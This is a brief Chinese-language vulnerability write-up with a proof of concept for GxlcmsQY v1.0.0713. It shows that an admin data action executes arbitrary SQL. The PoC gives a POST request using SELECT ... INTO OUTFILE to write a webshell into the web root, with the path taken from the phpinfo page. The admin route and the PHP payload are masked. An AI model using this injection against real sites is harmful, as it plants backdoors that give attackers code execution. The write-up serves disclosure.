1.分析

CMS下载地址:http://bbs.gxlcms.com/article/9

版本:GxlcmsQY v1.0.0713

\Lib\Lib\Action\Admin\DataAction.class.php

这里获取参数sql,然后放到query()函数中作为SQL语句执行,没有做任何限制,所以可以执行任意SQL语句,我们可以利用into outfile导出webshell。需要注意的是这里用分号分割了sql语句,所以导出的webshell不能包含分号。

 

利用into outfile的前提是需要知道网站绝对路径。

而\Lib\Lib\Action\Admin\IndexAction.class.php中函数phpinfo()提供了phpinfo的功能。

 

 

2.poc

1.获取网站绝对路径

http://127.0.0.1/gxlcms/index.php?s=Admin-***

 

2.访问http://127.0.0.1/gxlcms/index.php?s=Admin-***

POST: sql=select '<?php xxxxxx?>' INTO OUTFILE 'D:/phpStudy2016/WWW/gxlcms/1.php';&submit=%E6%8F%90+%E4%BA%A4&hash=ab2af3933aa472eba3a25e8d69852e55

3.成功获得webshell